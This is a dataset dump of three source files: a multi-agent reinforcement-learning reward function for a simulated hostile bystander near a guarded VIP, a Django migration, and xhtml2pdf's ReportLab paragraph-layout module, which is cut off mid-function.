self.action_callback = None
#self.color = np.array([0.8, 0.0, 1.1])
def observation(self):
"""returns the observation of a hostile bystander"""
other_pos = []
other_vel = []
for other in self.scenario.world.agents:
if other is self: continue
other_pos.append(other.state.p_pos - self.state.p_pos)
other_vel.append(other.state.p_vel)
return np.concatenate([self.state.p_vel] + other_pos + other_vel)
def reward(self, world):
"""Reward for Hostile Bystander for being a threat to the VIP"""
vip_agent = self.scenario.vip_agent
rew = Threat(vip_agent, self.scenario.bodyguards, [self]).calculate_residual_threat_at_every_step()
bodyguards = self.scenario.bodyguards
for bodyguard in bodyguards:
rew += 0.1 * self.distance(bodyguard)
if self.is_collision(bodyguard):
rew -= 10
if self.is_collision(vip_agent):
rew += 10
def bound(x):
if x < 0.9:
return 0
if x < 1.0:
return (x - 0.9) * 10
return min(np.exp(2 * x - 2), 10)
for p in range(world.dim_p):
x = abs(self.state.p_pos[p])
rew -= bound(x)
return rew
| [
"[email protected]"
]
| |
56db26ac23eb5330f73c013d50f5c5683be26524 | ee3ededc11e224619506d39c95cd4c8a150b9ffc | /run/migrations/0022_auto_20210610_0543.py | c9d3e8ffae0d8ff5ddf7955fc8397c7651b14ea5 | []
| no_license | TwoPointFour/django-backend | 5b37b11c63c5f7b061d323af191dd7cc725c885c | fd41da863df4cf79e5c8f9af2b211d6628ab6651 | refs/heads/main | 2023-08-11T14:01:39.604186 | 2021-09-27T05:04:13 | 2021-09-27T05:04:13 | 377,231,515 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 626 | py | # Generated by Django 3.2.3 on 2021-06-09 21:43
from django.db import migrations, models
import run.models
class Migration(migrations.Migration):
dependencies = [
('run', '0021_alter_workoutlog_workouts'),
]
operations = [
migrations.AddField(
model_name='profile',
name='alias',
field=models.CharField(blank=True, max_length=50),
),
migrations.AlterField(
model_name='profile',
name='profileImage',
field=models.ImageField(default='default/default.jpg', upload_to=run.models.upload_to),
),
]
| [
"[email protected]"
]
| |
7dd79a81c2691091fdf63dedb45319a7eae1a591 | 0fb12be061ab050904ceea99f6a938985a0d8acf | /report_mako2pdf/lib/xhtml2pdf/reportlab_paragraph.py | eba9e9aa506f6c2e6a82f44c220787a1075fbb14 | []
| no_license | libermatos/Openerp_6.1 | d17fbff1f35948e0c4176e2ed34ac5d7f8453834 | 510df13df7ea651c055b408ad66c580ca29d4ad7 | refs/heads/master | 2023-06-19T00:24:36.002581 | 2021-07-07T01:17:20 | 2021-07-07T01:17:20 | 383,574,889 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 71,161 | py | # -*- coding: utf-8 -*-
# Copyright ReportLab Europe Ltd. 2000-2008
# see license.txt for license details
# history http://www.reportlab.co.uk/cgi-bin/viewcvs.cgi/public/reportlab/trunk/reportlab/platypus/paragraph.py
# Modifications by Dirk Holtwick, 2008
from string import join, whitespace
from operator import truth
from reportlab.pdfbase.pdfmetrics import stringWidth, getAscentDescent
from reportlab.platypus.paraparser import ParaParser
from reportlab.platypus.flowables import Flowable
from reportlab.lib.colors import Color
from reportlab.lib.enums import TA_LEFT, TA_RIGHT, TA_CENTER, TA_JUSTIFY
from reportlab.lib.textsplit import ALL_CANNOT_START
from copy import deepcopy
from reportlab.lib.abag import ABag
import re
PARAGRAPH_DEBUG = False
LEADING_FACTOR = 1.0
_wsc_re_split = re.compile('[%s]+' % re.escape(''.join((
u'\u0009', # HORIZONTAL TABULATION
u'\u000A', # LINE FEED
u'\u000B', # VERTICAL TABULATION
u'\u000C', # FORM FEED
u'\u000D', # CARRIAGE RETURN
u'\u001C', # FILE SEPARATOR
u'\u001D', # GROUP SEPARATOR
u'\u001E', # RECORD SEPARATOR
u'\u001F', # UNIT SEPARATOR
u'\u0020', # SPACE
u'\u0085', # NEXT LINE
#u'\u00A0', # NO-BREAK SPACE
u'\u1680', # OGHAM SPACE MARK
u'\u2000', # EN QUAD
u'\u2001', # EM QUAD
u'\u2002', # EN SPACE
u'\u2003', # EM SPACE
u'\u2004', # THREE-PER-EM SPACE
u'\u2005', # FOUR-PER-EM SPACE
u'\u2006', # SIX-PER-EM SPACE
u'\u2007', # FIGURE SPACE
u'\u2008', # PUNCTUATION SPACE
u'\u2009', # THIN SPACE
u'\u200A', # HAIR SPACE
u'\u200B', # ZERO WIDTH SPACE
u'\u2028', # LINE SEPARATOR
u'\u2029', # PARAGRAPH SEPARATOR
u'\u202F', # NARROW NO-BREAK SPACE
u'\u205F', # MEDIUM MATHEMATICAL SPACE
u'\u3000', # IDEOGRAPHIC SPACE
)))).split
def split(text, delim=None):
if type(text) is str:
text = text.decode('utf8')
if type(delim) is str:
delim = delim.decode('utf8')
elif delim is None and u'\xa0' in text:
return [uword.encode('utf8') for uword in _wsc_re_split(text)]
return [uword.encode('utf8') for uword in text.split(delim)]
def strip(text):
if type(text) is str:
text = text.decode('utf8')
return text.strip().encode('utf8')
class ParaLines(ABag):
"""
class ParaLines contains the broken into lines representation of Paragraphs
kind=0 Simple
fontName, fontSize, textColor apply to whole Paragraph
lines [(extraSpace1,words1),....,(extraspaceN,wordsN)]
kind==1 Complex
lines [FragLine1,...,FragLineN]
"""
class FragLine(ABag):
"""
class FragLine contains a styled line (ie a line with more than one style)::
extraSpace unused space for justification only
wordCount 1+spaces in line for justification purposes
words [ParaFrags] style text lumps to be concatenated together
fontSize maximum fontSize seen on the line; not used at present,
but could be used for line spacing.
"""
#our one and only parser
# XXXXX if the parser has any internal state using only one is probably a BAD idea!
_parser = ParaParser()
def _lineClean(L):
return join(filter(truth, split(strip(L))))
def cleanBlockQuotedText(text, joiner=' '):
"""This is an internal utility which takes triple-
quoted text form within the document and returns
(hopefully) the paragraph the user intended originally."""
L = filter(truth, map(_lineClean, split(text, '\n')))
return join(L, joiner)
def setXPos(tx, dx):
if dx > 1e-6 or dx < -1e-6:
tx.setXPos(dx)
def _leftDrawParaLine(tx, offset, extraspace, words, last=0):
setXPos(tx, offset)
tx._textOut(join(words), 1)
setXPos(tx, -offset)
return offset
def _centerDrawParaLine(tx, offset, extraspace, words, last=0):
m = offset + 0.5 * extraspace
setXPos(tx, m)
tx._textOut(join(words), 1)
setXPos(tx, -m)
return m
def _rightDrawParaLine(tx, offset, extraspace, words, last=0):
m = offset + extraspace
setXPos(tx, m)
tx._textOut(join(words), 1)
setXPos(tx, -m)
return m
def _justifyDrawParaLine(tx, offset, extraspace, words, last=0):
setXPos(tx, offset)
text = join(words)
if last:
#last one, left align
tx._textOut(text, 1)
else:
nSpaces = len(words) - 1
if nSpaces:
tx.setWordSpace(extraspace / float(nSpaces))
tx._textOut(text, 1)
tx.setWordSpace(0)
else:
tx._textOut(text, 1)
setXPos(tx, -offset)
return offset
def imgVRange(h, va, fontSize):
"""
return bottom,top offsets relative to baseline(0)
"""
if va == 'baseline':
iyo = 0
elif va in ('text-top', 'top'):
iyo = fontSize - h
elif va == 'middle':
iyo = fontSize - (1.2 * fontSize + h) * 0.5
elif va in ('text-bottom', 'bottom'):
iyo = fontSize - 1.2 * fontSize
elif va == 'super':
iyo = 0.5 * fontSize
elif va == 'sub':
iyo = -0.5 * fontSize
elif hasattr(va, 'normalizedValue'):
iyo = va.normalizedValue(fontSize)
else:
iyo = va
return iyo, iyo + h
_56 = 5. / 6
_16 = 1. / 6
def _putFragLine(cur_x, tx, line):
xs = tx.XtraState
cur_y = xs.cur_y
x0 = tx._x0
autoLeading = xs.autoLeading
leading = xs.leading
cur_x += xs.leftIndent
dal = autoLeading in ('min', 'max')
if dal:
if autoLeading == 'max':
ascent = max(_56 * leading, line.ascent)
descent = max(_16 * leading, -line.descent)
else:
ascent = line.ascent
descent = -line.descent
leading = ascent + descent
if tx._leading != leading:
tx.setLeading(leading)
if dal:
olb = tx._olb
if olb is not None:
xcy = olb - ascent
if tx._oleading != leading:
cur_y += leading - tx._oleading
if abs(xcy - cur_y) > 1e-8:
cur_y = xcy
tx.setTextOrigin(x0, cur_y)
xs.cur_y = cur_y
tx._olb = cur_y - descent
tx._oleading = leading
# Letter spacing
if xs.style.letterSpacing != 'normal':
tx.setCharSpace(int(xs.style.letterSpacing))
ws = getattr(tx, '_wordSpace', 0)
nSpaces = 0
words = line.words
for f in words:
if hasattr(f, 'cbDefn'):
cbDefn = f.cbDefn
kind = cbDefn.kind
if kind == 'img':
#draw image cbDefn,cur_y,cur_x
w = cbDefn.width
h = cbDefn.height
txfs = tx._fontsize
if txfs is None:
txfs = xs.style.fontSize
iy0, iy1 = imgVRange(h, cbDefn.valign, txfs)
cur_x_s = cur_x + nSpaces * ws
tx._canvas.drawImage(cbDefn.image.getImage(), cur_x_s, cur_y + iy0, w, h, mask='auto')
cur_x += w
cur_x_s += w
setXPos(tx, cur_x_s - tx._x0)
elif kind == 'barcode':
barcode = cbDefn.barcode
w = cbDefn.width
h = cbDefn.height
txfs = tx._fontsize
if txfs is None:
txfs = xs.style.fontSize
iy0, iy1 = imgVRange(h, cbDefn.valign, txfs)
cur_x_s = cur_x + nSpaces * ws
barcode.draw(canvas=tx._canvas, xoffset=cur_x_s)
cur_x += w
cur_x_s += w
setXPos(tx, cur_x_s - tx._x0)
else:
name = cbDefn.name
if kind == 'anchor':
tx._canvas.bookmarkHorizontal(name, cur_x, cur_y + leading)
else:
func = getattr(tx._canvas, name, None)
if not func:
raise AttributeError("Missing %s callback attribute '%s'" % (kind, name))
func(tx._canvas, kind, cbDefn.label)
if f is words[-1]:
if not tx._fontname:
tx.setFont(xs.style.fontName, xs.style.fontSize)
tx._textOut('', 1)
elif kind == 'img':
tx._textOut('', 1)
else:
cur_x_s = cur_x + nSpaces * ws
if (tx._fontname, tx._fontsize) != (f.fontName, f.fontSize):
tx._setFont(f.fontName, f.fontSize)
if xs.textColor != f.textColor:
xs.textColor = f.textColor
tx.setFillColor(f.textColor)
if xs.rise != f.rise:
xs.rise = f.rise
tx.setRise(f.rise)
text = f.text
tx._textOut(text, f is words[-1]) # cheap textOut
# XXX Modified for XHTML2PDF
# Background colors (done like underline)
if hasattr(f, "backColor"):
if xs.backgroundColor != f.backColor or xs.backgroundFontSize != f.fontSize:
if xs.backgroundColor is not None:
xs.backgrounds.append((xs.background_x, cur_x_s, xs.backgroundColor, xs.backgroundFontSize))
xs.background_x = cur_x_s
xs.backgroundColor = f.backColor
xs.backgroundFontSize = f.fontSize
# Underline
if not xs.underline and f.underline:
xs.underline = 1
xs.underline_x = cur_x_s
xs.underlineColor = f.textColor
elif xs.underline:
if not f.underline:
xs.underline = 0
xs.underlines.append((xs.underline_x, cur_x_s, xs.underlineColor))
xs.underlineColor = None
elif xs.textColor != xs.underlineColor:
xs.underlines.append((xs.underline_x, cur_x_s, xs.underlineColor))
xs.underlineColor = xs.textColor
xs.underline_x = cur_x_s
# Strike
if not xs.strike and f.strike:
xs.strike = 1
xs.strike_x = cur_x_s
xs.strikeColor = f.textColor
# XXX Modified for XHTML2PDF
xs.strikeFontSize = f.fontSize
elif xs.strike:
if not f.strike:
xs.strike = 0
# XXX Modified for XHTML2PDF
xs.strikes.append((xs.strike_x, cur_x_s, xs.strikeColor, xs.strikeFontSize))
xs.strikeColor = None
xs.strikeFontSize = None
elif xs.textColor != xs.strikeColor:
xs.strikes.append((xs.strike_x, cur_x_s, xs.strikeColor, xs.strikeFontSize))
xs.strikeColor = xs.textColor
xs.strikeFontSize = f.fontSize
xs.strike_x = cur_x_s
if f.link and not xs.link:
if not xs.link:
xs.link = f.link
xs.link_x = cur_x_s
xs.linkColor = xs.textColor
elif xs.link:
if not f.link:
xs.links.append((xs.link_x, cur_x_s, xs.link, xs.linkColor))
xs.link = None
xs.linkColor = None
elif f.link != xs.link or xs.textColor != xs.linkColor:
xs.links.append((xs.link_x, cur_x_s, xs.link, xs.linkColor))
xs.link = f.link
xs.link_x = cur_x_s
xs.linkColor = xs.textColor
txtlen = tx._canvas.stringWidth(text, tx._fontname, tx._fontsize)
cur_x += txtlen
nSpaces += text.count(' ')
cur_x_s = cur_x + (nSpaces - 1) * ws
# XXX Modified for XHTML2PDF
# Underline
if xs.underline:
xs.underlines.append((xs.underline_x, cur_x_s, xs.underlineColor))
# XXX Modified for XHTML2PDF
# Backcolor
if hasattr(f, "backColor"):
if xs.backgroundColor is not None:
xs.backgrounds.append((xs.background_x, cur_x_s, xs.backgroundColor, xs.backgroundFontSize))
# XXX Modified for XHTML2PDF
# Strike
if xs.strike:
xs.strikes.append((xs.strike_x, cur_x_s, xs.strikeColor, xs.strikeFontSize))
if xs.link:
xs.links.append((xs.link_x, cur_x_s, xs.link, xs.linkColor))
if tx._x0 != x0:
setXPos(tx, x0 - tx._x0)
def _leftDrawParaLineX( tx, offset, line, last=0):
setXPos(tx, offset)
_putFragLine(offset, tx, line)
setXPos(tx, -offset)
def _centerDrawParaLineX( tx, offset, line, last=0):
m = offset + 0.5 * line.extraSpace
setXPos(tx, m)
_putFragLine(m, tx, line)
setXPos(tx, -m)
def _rightDrawParaLineX( tx, offset, line, last=0):
m = offset + line.extraSpace
setXPos(tx, m)
_putFragLine(m, tx, line)
setXPos(tx, -m)
def _justifyDrawParaLineX( tx, offset, line, last=0):
setXPos(tx, offset)
extraSpace = line.extraSpace
nSpaces = line.wordCount - 1
if last or not nSpaces or abs(extraSpace) <= 1e-8 or line.lineBreak:
_putFragLine(offset, tx, line) # no space modification
else:
tx.setWordSpace(extraSpace / float(nSpaces))
_putFragLine(offset, tx, line)
tx.setWordSpace(0)
setXPos(tx, -offset)
def _sameFrag(f, g):
"""
returns 1 if two ParaFrags map out the same
"""
if (hasattr(f, 'cbDefn') or hasattr(g, 'cbDefn')
or hasattr(f, 'lineBreak') or hasattr(g, 'lineBreak')): return 0
for a in ('fontName', 'fontSize', 'textColor', 'backColor', 'rise', 'underline', 'strike', 'link'):
if getattr(f, a, None) != getattr(g, a, None): return 0
return 1
def _getFragWords(frags):
"""
given a Parafrag list return a list of fragwords
[[size, (f00,w00), ..., (f0n,w0n)],....,[size, (fm0,wm0), ..., (f0n,wmn)]]
each pair f,w represents a style and some string
each sublist represents a word
"""
R = []
W = []
n = 0
hangingStrip = False
for f in frags:
text = f.text
# of paragraphs
if text != '':
if hangingStrip:
hangingStrip = False
text = text.lstrip()
S = split(text)
if S == []:
S = ['']
if W != [] and text[0] in whitespace:
W.insert(0, n)
R.append(W)
W = []
n = 0
for w in S[:-1]:
W.append((f, w))
n += stringWidth(w, f.fontName, f.fontSize)
W.insert(0, n)
R.append(W)
W = []
n = 0
w = S[-1]
W.append((f, w))
n += stringWidth(w, f.fontName, f.fontSize)
if text and text[-1] in whitespace:
W.insert(0, n)
R.append(W)
W = []
n = 0
elif hasattr(f, 'cbDefn'):
w = getattr(f.cbDefn, 'width', 0)
if w:
if W != []:
W.insert(0, n)
R.append(W)
W = []
n = 0
R.append([w, (f, '')])
else:
W.append((f, ''))
elif hasattr(f, 'lineBreak'):
#pass the frag through. The line breaker will scan for it.
if W != []:
W.insert(0, n)
R.append(W)
W = []
n = 0
R.append([0, (f, '')])
hangingStrip = True
if W != []:
W.insert(0, n)
R.append(W)
return R
def _split_blParaSimple(blPara, start, stop):
f = blPara.clone()
for a in ('lines', 'kind', 'text'):
if hasattr(f, a): delattr(f, a)
f.words = []
for l in blPara.lines[start:stop]:
for w in l[1]:
f.words.append(w)
return [f]
def _split_blParaHard(blPara, start, stop):
f = []
lines = blPara.lines[start:stop]
for l in lines:
for w in l.words:
f.append(w)
if l is not lines[-1]:
i = len(f) - 1
while i >= 0 and hasattr(f[i], 'cbDefn') and not getattr(f[i].cbDefn, 'width', 0): i -= 1
if i >= 0:
g = f[i]
if not g.text:
g.text = ' '
elif g.text[-1] != ' ':
g.text += ' '
return f
def _drawBullet(canvas, offset, cur_y, bulletText, style):
"""
draw a bullet text could be a simple string or a frag list
"""
tx2 = canvas.beginText(style.bulletIndent, cur_y + getattr(style, "bulletOffsetY", 0))
tx2.setFont(style.bulletFontName, style.bulletFontSize)
tx2.setFillColor(hasattr(style, 'bulletColor') and style.bulletColor or style.textColor)
if isinstance(bulletText, basestring):
tx2.textOut(bulletText)
else:
for f in bulletText:
if hasattr(f, "image"):
image = f.image
width = image.drawWidth
height = image.drawHeight
gap = style.bulletFontSize * 0.25
img = image.getImage()
# print style.bulletIndent, offset, width
canvas.drawImage(
img,
style.leftIndent - width - gap,
cur_y + getattr(style, "bulletOffsetY", 0),
width,
height)
else:
tx2.setFont(f.fontName, f.fontSize)
tx2.setFillColor(f.textColor)
tx2.textOut(f.text)
canvas.drawText(tx2)
#AR making definition lists a bit less ugly
#bulletEnd = tx2.getX()
bulletEnd = tx2.getX() + style.bulletFontSize * 0.6
offset = max(offset, bulletEnd - style.leftIndent)
return offset
def _handleBulletWidth(bulletText, style, maxWidths):
"""
work out bullet width and adjust maxWidths[0] if neccessary
"""
if bulletText:
if isinstance(bulletText, basestring):
bulletWidth = stringWidth(bulletText, style.bulletFontName, style.bulletFontSize)
else:
#it's a list of fragments
bulletWidth = 0
for f in bulletText:
bulletWidth = bulletWidth + stringWidth(f.text, f.fontName, f.fontSize)
bulletRight = style.bulletIndent + bulletWidth + 0.6 * style.bulletFontSize
indent = style.leftIndent + style.firstLineIndent
if bulletRight > indent:
#..then it overruns, and we have less space available on line 1
maxWidths[0] -= (bulletRight - indent)
def splitLines0(frags, widths):
"""
given a list of ParaFrags we return a list of ParaLines
each ParaLine has
1) ExtraSpace
2) blankCount
3) [textDefns....]
each text definition is a (ParaFrag, start, limit) triplet
"""
#initialise the algorithm
lines = []
lineNum = 0
maxW = widths[lineNum]
i = -1
l = len(frags)
lim = start = 0
while 1:
#find a non whitespace character
while i < l:
while start < lim and text[start] == ' ': start += 1
if start == lim:
i += 1
if i == l: break
start = 0
f = frags[i]
text = f.text
lim = len(text)
else:
break # we found one
if start == lim: break # if we didn't find one we are done
#start of a line
g = (None, None, None)
line = []
cLen = 0
nSpaces = 0
while cLen < maxW:
j = text.find(' ', start)
if j < 0:
j == lim
w = stringWidth(text[start:j], f.fontName, f.fontSize)
cLen += w
if cLen > maxW and line != []:
cLen = cLen - w
#this is the end of the line
while g.text[lim] == ' ':
lim -= 1
nSpaces -= 1
break
if j < 0:
j = lim
if g[0] is f:
g[2] = j #extend
else:
g = (f, start, j)
line.append(g)
if j == lim:
i += 1
def _do_under_line(i, t_off, ws, tx, lm=-0.125):
y = tx.XtraState.cur_y - i * tx.XtraState.style.leading + lm * tx.XtraState.f.fontSize
textlen = tx._canvas.stringWidth(join(tx.XtraState.lines[i][1]), tx._fontname, tx._fontsize)
tx._canvas.line(t_off, y, t_off + textlen + ws, y)
_scheme_re = re.compile('^[a-zA-Z][-+a-zA-Z0-9]+$')
def _doLink(tx, link, rect):
if isinstance(link, unicode):
link = link.encode('utf8')
parts = link.split(':', 1)
scheme = len(parts) == 2 and parts[0].lower() or ''
if _scheme_re.match(scheme) and scheme != 'document':
kind = scheme.lower() == 'pdf' and 'GoToR' or 'URI'
if kind == 'GoToR': link = parts[1]
tx._canvas.linkURL(link, rect, relative=1, kind=kind)
else:
if link[0] == '#':
link = link[1:]
scheme = ''
tx._canvas.linkRect("", scheme != 'document' and link or parts[1], rect, relative=1)
def _do_link_line(i, t_off, ws, tx):
xs = tx.XtraState
leading = xs.style.leading
y = xs.cur_y - i * leading - xs.f.fontSize / 8.0 # 8.0 factor copied from para.py
text = join(xs.lines[i][1])
textlen = tx._canvas.stringWidth(text, tx._fontname, tx._fontsize)
_doLink(tx, xs.link, (t_off, y, t_off + textlen + ws, y + leading))
# XXX Modified for XHTML2PDF
def _do_post_text(tx):
"""
Try to find out what the variables mean:
tx A structure containing more informations about paragraph ???
leading Height of lines
ff 1/8 of the font size
y0 The "baseline" postion ???
y 1/8 below the baseline
"""
xs = tx.XtraState
leading = xs.style.leading
autoLeading = xs.autoLeading
f = xs.f
if autoLeading == 'max':
# leading = max(leading, f.fontSize)
leading = max(leading, LEADING_FACTOR * f.fontSize)
elif autoLeading == 'min':
leading = LEADING_FACTOR * f.fontSize
ff = 0.125 * f.fontSize
y0 = xs.cur_y
y = y0 - ff
# Background
for x1, x2, c, fs in xs.backgrounds:
inlineFF = fs * 0.125
gap = inlineFF * 1.25
tx._canvas.setFillColor(c)
tx._canvas.rect(x1, y - gap, x2 - x1, fs + 1, fill=1, stroke=0)
xs.backgrounds = []
xs.background = 0
xs.backgroundColor = None
xs.backgroundFontSize = None
# Underline
yUnderline = y0 - 1.5 * ff
tx._canvas.setLineWidth(ff * 0.75)
csc = None
for x1, x2, c in xs.underlines:
if c != csc:
tx._canvas.setStrokeColor(c)
csc = c
tx._canvas.line(x1, yUnderline, x2, yUnderline)
xs.underlines = []
xs.underline = 0
xs.underlineColor = None
# Strike
for x1, x2, c, fs in xs.strikes:
inlineFF = fs * 0.125
ys = y0 + 2 * inlineFF
if c != csc:
tx._canvas.setStrokeColor(c)
csc = c
tx._canvas.setLineWidth(inlineFF * 0.75)
tx._canvas.line(x1, ys, x2, ys)
xs.strikes = []
xs.strike = 0
xs.strikeColor = None
yl = y + leading
for x1, x2, link, c in xs.links:
# No automatic underlining for links, never!
_doLink(tx, link, (x1, y, x2, yl))
xs.links = []
xs.link = None
xs.linkColor = None
xs.cur_y -= leading
def textTransformFrags(frags, style):
tt = style.textTransform
if tt:
tt = tt.lower()
if tt == 'lowercase':
tt = unicode.lower
elif tt == 'uppercase':
tt = unicode.upper
elif tt == 'capitalize':
tt = unicode.title
elif tt == 'none':
return
else:
raise ValueError('ParaStyle.textTransform value %r is invalid' % style.textTransform)
n = len(frags)
if n == 1:
#single fragment the easy case
frags[0].text = tt(frags[0].text.decode('utf8')).encode('utf8')
elif tt is unicode.title:
pb = True
for f in frags:
t = f.text
if not t: continue
u = t.decode('utf8')
if u.startswith(u' ') or pb:
u = tt(u)
else:
i = u.find(u' ')
if i >= 0:
u = u[:i] + tt(u[i:])
pb = u.endswith(u' ')
f.text = u.encode('utf8')
else:
for f in frags:
t = f.text
if not t: continue
f.text = tt(t.decode('utf8')).encode('utf8')
class cjkU(unicode):
"""
simple class to hold the frag corresponding to a str
"""
def __new__(cls, value, frag, encoding):
self = unicode.__new__(cls, value)
self._frag = frag
if hasattr(frag, 'cbDefn'):
w = getattr(frag.cbDefn, 'width', 0)
self._width = w
else:
self._width = stringWidth(value, frag.fontName, frag.fontSize)
return self
frag = property(lambda self: self._frag)
width = property(lambda self: self._width)
def makeCJKParaLine(U, extraSpace, calcBounds):
words = []
CW = []
f0 = FragLine()
maxSize = maxAscent = minDescent = 0
for u in U:
f = u.frag
fontSize = f.fontSize
if calcBounds:
cbDefn = getattr(f, 'cbDefn', None)
if getattr(cbDefn, 'width', 0):
descent, ascent = imgVRange(cbDefn.height, cbDefn.valign, fontSize)
else:
ascent, descent = getAscentDescent(f.fontName, fontSize)
else:
ascent, descent = getAscentDescent(f.fontName, fontSize)
maxSize = max(maxSize, fontSize)
maxAscent = max(maxAscent, ascent)
minDescent = min(minDescent, descent)
if not _sameFrag(f0, f):
f0 = f0.clone()
f0.text = u''.join(CW)
words.append(f0)
CW = []
f0 = f
CW.append(u)
if CW:
f0 = f0.clone()
f0.text = u''.join(CW)
words.append(f0)
return FragLine(kind=1, extraSpace=extraSpace, wordCount=1, words=words[1:], fontSize=maxSize, ascent=maxAscent,
descent=minDescent)
def cjkFragSplit(frags, maxWidths, calcBounds, encoding='utf8'):
"""
This attempts to be wordSplit for frags using the dumb algorithm
"""
from reportlab.rl_config import _FUZZ
U = [] # get a list of single glyphs with their widths etc etc
for f in frags:
text = f.text
if not isinstance(text, unicode):
text = text.decode(encoding)
if text:
U.extend([cjkU(t, f, encoding) for t in text])
else:
U.append(cjkU(text, f, encoding))
lines = []
widthUsed = lineStartPos = 0
maxWidth = maxWidths[0]
for i, u in enumerate(U):
w = u.width
widthUsed += w
lineBreak = hasattr(u.frag, 'lineBreak')
endLine = (widthUsed > maxWidth + _FUZZ and widthUsed > 0) or lineBreak
if endLine:
if lineBreak: continue
extraSpace = maxWidth - widthUsed + w
#This is the most important of the Japanese typography rules.
#if next character cannot start a line, wrap it up to this line so it hangs
#in the right margin. We won't do two or more though - that's unlikely and
#would result in growing ugliness.
nextChar = U[i]
if nextChar in ALL_CANNOT_START:
extraSpace -= w
i += 1
lines.append(makeCJKParaLine(U[lineStartPos:i], extraSpace, calcBounds))
try:
maxWidth = maxWidths[len(lines)]
except IndexError:
maxWidth = maxWidths[-1] # use the last one
lineStartPos = i
widthUsed = w
i -= 1
#any characters left?
if widthUsed > 0:
lines.append(makeCJKParaLine(U[lineStartPos:], maxWidth - widthUsed, calcBounds))
return ParaLines(kind=1, lines=lines)
class Paragraph(Flowable):
"""
Paragraph(text, style, bulletText=None, caseSensitive=1)
text a string of stuff to go into the paragraph.
style is a style definition as in reportlab.lib.styles.
bulletText is an optional bullet defintion.
caseSensitive set this to 0 if you want the markup tags and their attributes to be case-insensitive.
This class is a flowable that can format a block of text
into a paragraph with a given style.
The paragraph Text can contain XML-like markup including the tags:
<b> ... </b> - bold
<i> ... </i> - italics
<u> ... </u> - underline
<strike> ... </strike> - strike through
<super> ... </super> - superscript
<sub> ... </sub> - subscript
<font name=fontfamily/fontname color=colorname size=float>
<onDraw name=callable label="a label">
<link>link text</link>
attributes of links
size/fontSize=num
name/face/fontName=name
fg/textColor/color=color
backcolor/backColor/bgcolor=color
dest/destination/target/href/link=target
<a>anchor text</a>
attributes of anchors
fontSize=num
fontName=name
fg/textColor/color=color
backcolor/backColor/bgcolor=color
href=href
<a name="anchorpoint"/>
<unichar name="unicode character name"/>
<unichar value="unicode code point"/>
<img src="path" width="1in" height="1in" valign="bottom"/>
The whole may be surrounded by <para> </para> tags
The <b> and <i> tags will work for the built-in fonts (Helvetica
/Times / Courier). For other fonts you need to register a family
of 4 fonts using reportlab.pdfbase.pdfmetrics.registerFont; then
use the addMapping function to tell the library that these 4 fonts
form a family e.g.
from reportlab.lib.fonts import addMapping
addMapping('Vera', 0, 0, 'Vera') #normal
addMapping('Vera', 0, 1, 'Vera-Italic') #italic
addMapping('Vera', 1, 0, 'Vera-Bold') #bold
addMapping('Vera', 1, 1, 'Vera-BoldItalic') #italic and bold
It will also be able to handle any MathML specified Greek characters.
"""
def __init__(self, text, style, bulletText=None, frags=None, caseSensitive=1, encoding='utf8'):
self.caseSensitive = caseSensitive
self.encoding = encoding
self._setup(text, style, bulletText, frags, cleanBlockQuotedText)
def __repr__(self):
n = self.__class__.__name__
L = [n + "("]
keys = self.__dict__.keys()
for k in keys:
v = getattr(self, k)
rk = repr(k)
rv = repr(v)
rk = " " + rk.replace("\n", "\n ")
rv = " " + rk.replace("\n", "\n ")
L.append(rk)
L.append(rv)
L.append(") #" + n)
return '\n'.join(L)
def _setup(self, text, style, bulletText, frags, cleaner):
if frags is None:
text = cleaner(text)
_parser.caseSensitive = self.caseSensitive
style, frags, bulletTextFrags = _parser.parse(text, style)
if frags is None:
raise ValueError("xml parser error (%s) in paragraph beginning\n'%s'" \
% (_parser.errors[0], text[:min(30, len(text))]))
textTransformFrags(frags, style)
if bulletTextFrags: bulletText = bulletTextFrags
#AR hack
self.text = text
self.frags = frags
self.style = style
self.bulletText = bulletText
self.debug = PARAGRAPH_DEBUG # turn this on to see a pretty one with all the margins etc.
def wrap(self, availWidth, availHeight):
if self.debug:
print id(self), "wrap"
try:
print repr(self.getPlainText()[:80])
except:
print "???"
# work out widths array for breaking
self.width = availWidth
style = self.style
leftIndent = style.leftIndent
first_line_width = availWidth - (leftIndent + style.firstLineIndent) - style.rightIndent
later_widths = availWidth - leftIndent - style.rightIndent
if style.wordWrap == 'CJK':
#use Asian text wrap algorithm to break characters
blPara = self.breakLinesCJK([first_line_width, later_widths])
else:
blPara = self.breakLines([first_line_width, later_widths])
self.blPara = blPara
autoLeading = getattr(self, 'autoLeading', getattr(style, 'autoLeading', ''))
leading = style.leading
if blPara.kind == 1 and autoLeading not in ('', 'off'):
height = 0
if autoLeading == 'max':
for l in blPara.lines:
height += max(l.ascent - l.descent, leading)
elif autoLeading == 'min':
for l in blPara.lines:
height += l.ascent - l.descent
else:
raise ValueError('invalid autoLeading value %r' % autoLeading)
else:
if autoLeading == 'max':
leading = max(leading, LEADING_FACTOR * style.fontSize)
elif autoLeading == 'min':
leading = LEADING_FACTOR * style.fontSize
height = len(blPara.lines) * leading
self.height = height
return self.width, height
def minWidth(self):
"""
Attempt to determine a minimum sensible width
"""
frags = self.frags
nFrags = len(frags)
if not nFrags: return 0
if nFrags == 1:
f = frags[0]
fS = f.fontSize
fN = f.fontName
words = hasattr(f, 'text') and split(f.text, ' ') or f.words
func = lambda w, fS=fS, fN=fN: stringWidth(w, fN, fS)
else:
words = _getFragWords(frags)
func = lambda x: x[0]
return max(map(func, words))
def _get_split_blParaFunc(self):
return self.blPara.kind == 0 and _split_blParaSimple or _split_blParaHard
def split(self, availWidth, availHeight):
if self.debug:
print id(self), "split"
if len(self.frags) <= 0: return []
#the split information is all inside self.blPara
if not hasattr(self, 'blPara'):
self.wrap(availWidth, availHeight)
blPara = self.blPara
style = self.style
autoLeading = getattr(self, 'autoLeading', getattr(style, 'autoLeading', ''))
leading = style.leading
lines = blPara.lines
if blPara.kind == 1 and autoLeading not in ('', 'off'):
s = height = 0
if autoLeading == 'max':
for i, l in enumerate(blPara.lines):
h = max(l.ascent - l.descent, leading)
n = height + h
if n > availHeight + 1e-8:
break
height = n
s = i + 1
elif autoLeading == 'min':
for i, l in enumerate(blPara.lines):
n = height + l.ascent - l.descent
if n > availHeight + 1e-8:
break
height = n
s = i + 1
else:
raise ValueError('invalid autoLeading value %r' % autoLeading)
else:
l = leading
if autoLeading == 'max':
l = max(leading, LEADING_FACTOR * style.fontSize)
elif autoLeading == 'min':
l = LEADING_FACTOR * style.fontSize
